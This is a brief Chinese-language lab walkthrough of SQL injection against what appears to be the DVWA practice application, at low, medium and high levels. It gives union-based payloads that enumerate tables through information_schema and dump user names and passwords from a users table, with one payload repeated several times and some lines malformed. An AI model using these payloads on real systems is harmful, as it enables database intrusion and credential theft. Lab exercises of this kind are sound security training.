SQL注入
1、 SQL注入。
切到SQL Injection 模块:
1.1 low
1' order by 2#
1' union select 1,2#
1' select 1,database()#
输入“1′ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #”
3.2.2 medium
打开抓包工具BurpLoader.jar
设置代理:
1 order by 2#
1 union select 1,2#
1 union select 1,column_name from information_schema.columns where table='0×7573657273'
输入
1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
ID: 1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
|
ID: 1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
|
ID: 1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
|
ID: 1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
|
ID: 1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
|
ID: 1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
|
这样就得到了users表中所有用户的user_id,first_name,last_name,password的数据。
3.2.3 high
1' order by 2#
1' union select 1,database()#